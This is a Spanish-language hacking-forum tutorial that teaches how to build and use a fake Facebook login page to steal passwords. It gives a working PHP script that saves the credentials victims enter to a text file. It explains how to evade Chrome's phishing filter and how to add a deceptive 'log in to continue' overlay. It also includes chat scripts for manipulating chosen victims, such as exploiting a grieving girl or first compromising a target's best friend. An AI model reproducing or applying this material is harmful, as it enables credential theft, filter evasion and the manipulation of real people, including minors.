CONTENIDO:

-Introduccin...2
-Como hacer un fake de facebook.3
-Indetectando un fake a chrome.13
-Ponerle inicia sesin para continuar para que
Se vea ms creble.........................................22
-Ingeniera Social para usar los fakes ..27

Bueno sean bienvenidos a este primer pdf de ingeniera

social impartido por mi elshotta.
Bueno como ya saben para hacer ingeniera social
seria bueno saber algo de html, css, javascript, php,
Pero no es 100% necesario.
De todas formas para entender ms y hacer sus fakes
mejor es bueno saber esos lenguajes, pero yo aca les
mostrare como Yo Empeze en este mundo sin saber de
ningno de esos lenguajes.

Bueno empezemos ya sin nada ms que decir :)

Bueno esto es un tema muy buscado en la red, todos

tuvimos que pasar por eso de andar buscando en
youtube, google, y al fin dando con los foros podemos
encontrar una mejor solucin.
En el foro hay muchsimos post sobre esto de crear un
fake de facebook, Outlook, lo que sea.
Pero veo que a los user no les queda muy claro o se
estancan en alguna parte y no hacen nada, terminan
buscando fakes online.
Entonces en esta gua tratare de ensearles a hacer un
fake de facebook de la manera que entiendan ms fcil.

Vamos a la pgina de facebook a la que haremos el

fake. Yo para mi gusto prefiero esta para los fakes de
facebook ms que la de inicio.
https://www.facebook.com/login.php?next=https%3A%2F%2Fw
ww.facebook.com%2Fmessages

Entonces le damos a click derecho -> ver cdigo fuente

de la pgina

Entonces veremos esta pgina copiamos todo y

guardamos en nuestro editor de texto
(Bloc de notas, dreamweaver, etc.)
Yo usare mi bloc de notas++, y lo guardan con el
clsico nombre index.html.

Lo abrimos para ver que todo est en orden para seguir

haciendo el fake.

Ok esta todo en orden ;), ahora vamos a darle a buscar

(en bloc de notas de Windows es ctrl+b, en bloc de
notas ++ es ctrl+f y en dreamweaver creo que es igual).
Y buscamos la palabra method sin comillas y
aparecer esto

Y vemos que antes del method ah un link

/login.php?login_attempt=1&next=https%3A%2F%2Fw
ww.facebook.com%2Fmessages
Lo borramos y ponemos login.php
Listo ya tenemos la mitad del fake ahora lo que yo hacia
cuando era muy novato para crear el login.php era buscar
por google o en un foro.
Como este que he puesto en Masters-Hackers y MostSecurity, pero como el curso viene siendo de M-H entonces
pondr una captura del post en M-H

Link: http://masters-hackers.info/showthread.php?t=27487

Entonces dice que debemos buscar el id y el name del

login y del pass, la forma ms fcil es con el firefox
seleccionar la parte donde se ponen los datos como en el
siguiente pantallazo.

Luego darle clic derecho -> ver cdigo fuente seleccionado

Y aparecer esto.

Ok entonces seria asi el php robadatos.

-----------------------------------------------------------------------------<?php
$id-email=$_POST["name-email"];
$id-pass=$_POST["name-pass"];
$guardar=fopen("pass.txt",a);
fwrite($guardar,"
".$id-email."
".$id-pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1;
url=http://www.facebook.com'>";
?>
-------------------------------------------------------------------------------

Ahora quiero que se imaginen como va quedando el fake

Me explico con esta imagen

Entonces vemos que en el campo de correo electrnico el

id y el name es email.
y ahora buscamos el del password

El id y el name son pass

Bien entonces crearemos nuestro login.php
Con el editor de texto

<?php
$email=$_POST["email"];
$pass=$_POST["pass"];
$guardar=fopen("pass.txt",a);
fwrite($guardar,"
".$email."
".$pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1;
url=http://www.facebook.com'>";
?>
Bueno ahora solo falta subirlo al hosting
Eso si no lo explicare por ac porque se va a alargar
mucho el curso, busquen en el foro que hay tengo un tuto
sobre eso :p .
Host recomendados:
www.hostyd.com
www.hostimite.com
www.hostinger.com

Ahora nos encontramos con un Nuevo enemigo

Que es filtro de chrome con su alerta de phising

Pero tranquilos en el otro captulo enseare a saltar este

molesto filtro

En este captulo enseare a indetectar cualquier fake a

chrome en este caso seguiremos con el de facebook.
Bueno seguimos
Lo que vamos a hacer es abrir el fake de facebook con el
editor de texto y vamos al final del documento y
empezaremos a borrar todo lo que no tenga que ver con el
fake

Borramos los script que no sirven para nada en nuestro

fake Y mientras vamos borrando, vamos actualizando el
fake (para evitar que los errores se impriman en la
pantalla).
Entonces borramos todos los <script></script>
Y ahora borraremos todos los href= />

Esto llevara un poco de tiempo :p ajajajaj

Ya cuando hayamos borrado todos los href= y los <script>
Del cdigo fuente llegamos a el top del fake (inicio)

Entonces lo que hacemos ac es guardar los css y el icono

en nuestra PC, vamos al primer css
https://fbstatica.akamaihd.net/rsrc.php/v2/y3/r/X5oSa59Mm
zA.css

y damos clic derecho-> guardar como y lo guardamos junto

al index.html

Dejen el mismo nombre, as

Actualicen el index.html y vemos que desaparece el

Facebook blanco que aparece en la esquina izquierda

WTF, Es bueno que actualicen la pagina del fake de vez en

cuando para detectar estos errores mas rpido.
Ahora vamos a abrir el css X5oSa59MmzA.css

y pondremos en el navegador los url que terminen en png o

sea una imagen
Agregando al comienzo la pagina de facebook
https://fbstatic-a.akamaihd.net

Entonces quedaria as

Bueno van probando los url hasta llegar a la imagen del

fake que falta

https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/r/BE57IGef_l.png
y guardamos la imagen en el mismo lugar donde este
el index.html y los css.
Y borramos toda la ruta de la imagen excepto el nombre de
espero me explique bien :p

Ahi sealo en rojo lo que tienen que borrar.

Cuando terminen de borrar guardan y actualizan la pagina
y vemos que la imagen de facebook que aparece en la
esquina a vuelto a reaparecer ;)
Bueno, guardamos todos los css (actualizando la pagina
para detectar errores)
Y nos debe de quedar as

Guarden el icono https://fbstatica.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico

Pero cambien de nombre mejor
Entonces para los perdidos van a la pagina y dan en
guardar imagen (dndole clic en la imagen)

Y guardan luego borran la ruta en el index.html dejando

solo el nombre del icono,

Ahora borren esto

Le cambiamos el nombre a donde dice facebook

Y actualizamos la pagina
Veremos esto

Y ahora vamos al primer css que tiene el nombre de

UZlg6QD4e_0.css
y buscamos donde diga facebook

Y ponemos el mismo nombre que pusimos en el html, en mi

caso fue lol ustedes pongan cualquiera

Bueno ahora indetectaremos los css, como? Pues borrando

cosas que no tengan que ver con el fake sin afectarlo :p
Aunque para esto es recomendable saber sobre css as se
ahorraran mucho tiempo, entonces para hacerlo ms rpido
vamos a borrar lneas de cdigo css.
Y como ya he dicho antes ACTUALIZEN LA PAGINA
CADA VEZ QUE HAGAN CAMBIOS
Entonces empezaremos borrando la primera lnea a ver
si No Al fake en el aspecto

Lo borramos y notamos que no cambio en el aspecto de la

pgina actualizndola

Borramos la siguiente lnea

Que sera todo esto

Y actualizamos la pagina y vemos que si ocurre un cambio

El grosor de las letras donde dice correo electrnico:

Y contrasea a cambiado, denle crtl + z para que regrese
la lnea del cdigo que No Debimos borrar
Bueno entonces se tornara muy largo si me pongo a
mostrar todo lo que pueden o no borrar, as que eso si se
los dejo a ustedes.
Esta es la parte que mas lleva tiempo porque tienen que
hacerlo lnea por lnea, pero estar indetectable al filtro de
chrome, como yo tengo mis fakes montados hace mucho
tiempo sin ser detectados por el filtro :D
Bueno sigamos con el prximo captulo.

Bueno esto es facil a comparacion de todo lo que hemos

visto anteriormente :D asi que prosigamos :p
Bueno ya habia puesto esto en el foro, pero pues va otra
vez jaajajajajaj.
Vamos a facebook y vemos cualquier imagen graciosa de
esas que aparecen en las paginas donde publican memes

Ok ahora vamos a abrir otra pestaa con la pagina de

facebook http://www.facebook.com

Ahora cerramos en la pagina de facebook (la que no es la

de la foto del meme! )

Y entonces vamos a la pagina donde esta la foto y

esperamos a que salga el clasico inicia secion para
continuar

Y guardamos la pagina con cualquier nombre

Abrimos con el editor de texto

Buscamos el nombre del perfil que tenemos (aca es donde

la mayoria de users se confunden)

ahora vamos al final del documento y buscamos la parte que empieze con <div
class="uiContextualDialogPositioner uiLayer hidden_elem
uiContextualDialogLeft"

Y buscamos la parte del boton para ponerle la redireccion

al fake

y agregamos el evento onclick="location.href = 'Archivo a re

direccionar'
http://www.masters-hackers.info/showthread.php?t=38779
ah tienen el post en M-H para que entiendan mejor
Ahora vamos al captulo final y el ms interesante que es el
de Trucos de ingeniera social para usar por chat

Bueno ac hemos llegado al tema ms interesante de esta

rama del hacking que es el de la Ingeniera Social, ya
tenemos todos los materiales necesarios que son
*fake de facebook
*inicia sesin para continuar para que se vea mas creble
*fake indetectable

Pero hace falta lo ms importante que es el Cmo

usarlos? Algunos de ustedes dirn
-eso es lo ms fcil solo es enviarlo y ya est, tienen el
password de la vctima.
Pero pueden que tengan razn pero no todas las victimas
que van a tener son igual de ignorantes unas son mas
listas que otras y no todas caern con los mismos trucos.
Bueno entonces la ingeniera social tiene algo de
psicologa.
Bueno como nos ensearon algna vez en la escuela
la psicologa es la ciencia que estudia al alma y del alma
viene la personalidad, el consciente y el inconsciente
no estoy pidiendo que estudien psicologa para hacer
ingeniera social, pero es bueno saber cmo se comportan
las personas en estas pocas :P
Entonces para hackear un facebook se tiene que tomar
los siguientes pasos
1) Reconocimiento de cmo es tu victima
2) Mirando quien es de sus mejores amigos
3) Al momento de empezarle a hablar y ganar confianza
mirar en qu estado de nimo se encuentra (tristeza,
furia, felicidad, etc.)

Bueno hagmonos la idea de que nos mandaron a hackear

este perfil de esta nena

Entonces vemos el paso uno que es Reconocimiento

Vemos que su perro muri hace un mes eso puede

decirnos que se encuentra deprimida lo que significa que
conocer a algn extrao (nosotros) no es lo que ms quiere
hacer, tal vez hasta terminara rechazndonos y
desconectndonos el chat y eso no nos servira mucho :p

Es hincha de millonarios as que cuando empecemos a

ganar confianza decir algo como de que equipo eres
hincha?
Y ella dir obvio de millos y t dices yo tambin nos
llevaremos muy bien (as no seas de millonarios ajajajaj)
Bueno muchas cosas que pueden sacar para recolectar
informacin, como ver que parece alguien social y
simptica eso nos har las cosas ms fcil :)

Bueno iremos al segundo punto Mirar sus mejores

amigos

Vemos las personas que etiqueta en sus fotos son

personas de confianza o buenos amigos
Obvio tu no etiquetaras en una foto a alguien que te caiga
mal.
Entonces se preguntan para que esto? Para que quiero
ver a sus amigos, si lo que me interesa es su pass?
Pues muy fcil, digamos que agregas a la victima pero
cuando vas a hablar con ella, vez que se nota muy distante
y no te habla o te evita, lo mejor que podras hacer es
agregar a uno de sus mejores amigos, los que comenten
siempre sus estados en facebook o que siempre etiquete
en sus fotos, y robarles el pass a su mejor amigo y luego
robar el pass de la victima original ya que no desconfiara
de que su mejor amigo quiera hacerle algo Tan malo que
es robarle la pass de su cuenta jaajajajaj.

Bueno en el punto tres Mirar estado de nimo de la

victima
Pondr algunos ejemplos escritos porque no tengo
agregada a la victima ajajja
Ok para mi gusto prefiero usar perfiles falsos o hacked para
hacer mis ataques de ingeniera social.
de un Hombre y otro de una Mujer, ambos jvenes porque
siempre que me buscan para hackear facebook son
jvenes entre 16 a 25 aos.

Entonces tenia que hackear a un hombre entonces use el

perfil de la mujer, lo agregue cuando me acepto, espere a
que estuviera conectado y empec con la conversacin
marcare lo que yo digo con y lo que dice la vctima con
rojo
-Hola
-hola
-como estas?
-Venga quien es usted la conozco o me distingue o que es
lo que quiere
Que podemos observar aqu?
bueno vemos que la victima esta con mal humor o siempre
se porta as con los desconocidos entonces ganar su
confianza se nos dificultara mas
Otro ejemplo muy molesto es este

-Hola
-Hola
-como estas?
-bien y tu?
-bien bien, oye me regalas un like a esta foto (link del fake )
-ok ;)
- (dos minutos despus) oye ya le diste like, no me llego
nada :(
-like a qu?
- a la foto que te mande (enviamos de nuevo el fake)
-no me abre nada
-mmmm de verdad pero ya varios amigos me han dado like
-mmm no se
Esto en realidad es muy molesto que la vctima no se sabe
en que mundo esta o tal vez se dio cuenta de que la estn
intentando hackear (pero normalmente te mandan a la
mierda jajajajajaaj), o tal vez tiene miedo de abrir el link
porque piensa que es algn virus o no se sabe, pero no
abre el link porque eres un desconocido que le est
enviando un link.
Bueno estos son los ms vistos :p (de los que no caen).

Existen tres mtodos para hacer ingeniera social que he

descubierto con el tiempo y se los explicare :D

Mtodo Seco:
Este mtodo es uno de los mtodos ms usados para
hacer ingeniera social por chat, pero no es el ms
recomendable, ejemplo.
------------------------------------------------------------------------------Hola
-Hola
-oye reglame un like a esta foto (enviamos fake)
-ok
-ya le di like ;)
-gracias
------------------------------------------------------------------------------O tambin esta de esta forma
-Hola
-oye esta eres tu o alguien creo un perfil y pone tus fotos
(link del fake, esto es para llamar su atencin)
-si esa foto es mia
------------------------------------------------------------------------------Entonces vemos que el mtodo seco se trata de enviarle el
fake sin tener confianza ni nada, este mtodo funciona 45%
de las veces.

Mtodo de esperar a que haya confianza

total:
Este mtodo es el ms demorado pero es el ms efectivo
de todos, porque tienes que hablar demasiado con la
vctima y ganar su confianza como haras con una amiga o
amigo de verdad, la confianza se gana despus de dos
das pero si lo que no tienes es tiempo para todo eso ac
viene el otro mtodo.

Mtodo de confundir a la vctima:

Este mtodo es el que ms uso yo, se trata de cmo dice
confundir a la vctima vean el ejemplo
-Hola
-Hola
-Como estas?
-bien y tu?
-Bien Bien
-oye cuando nos vamos a volver a ver
-te conozco???
-ushh no te acuerdas de mi?
-no o.O
-no te acuerdas que estbamos en el parque que dia con
tus amigos y que yo llege ah y empezamos a hablar?
- o.O no no me acuerdo,
-dime cual parque? Quienes estaban?
(aca ya debimos haber recolectado informacin de lugar
donde vive la vctima y sus amigos)
-en el parque que queda atrs del xito
-mmmm no me acuerdo la verdad, dime cual amigo
-mira fue este, el me dio tu facebook (enviamos fake)
-no me aparece nada (ponemos que el fake re direccione a
una pgina de facebook que dice no se pudo encontrar la
pagina)
-mmmm tal vez es porque el me dijo que iba a desactivar la
cuenta porque tuvo problemas con la novia

-mmmm ok
-pero yo te lo envi cuando la active de nuevo
-ok
(Miramos las contraseas capturadas y ah debe de estar
su pass :D)

Bueno ya hasta ac termina el pdf del curso de ingeniera

social impartido por mi
Elshotta

Fin